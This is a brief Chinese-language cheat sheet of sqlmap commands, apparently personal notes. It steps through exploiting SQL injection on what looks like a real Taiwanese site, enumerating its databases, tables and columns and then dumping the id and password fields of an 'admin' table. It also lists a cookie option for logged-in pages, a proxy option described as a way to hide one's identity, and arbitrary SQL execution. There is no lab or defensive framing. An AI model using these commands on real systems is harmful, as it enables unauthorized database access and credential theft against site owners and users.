sqlmal-command

检查注入点

1	sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11

列数据库信息

1	sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

指定库名列出所有表

1	sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables

指定库名表名列出所有字段

1	sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns

指定库名表名字段dump出指定字段

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump 
--cookie=COOKIE //在需要登录的地方，需要登录后的cookie 
--proxy="http://127.0.0.1:8087" 使用HTTP代理隐藏自己的身份，比如使用goagent等

--sql-query=QUERY               执行一个sql语句，不一定支持

.\sqlmapproject-sqlmap-17bfda1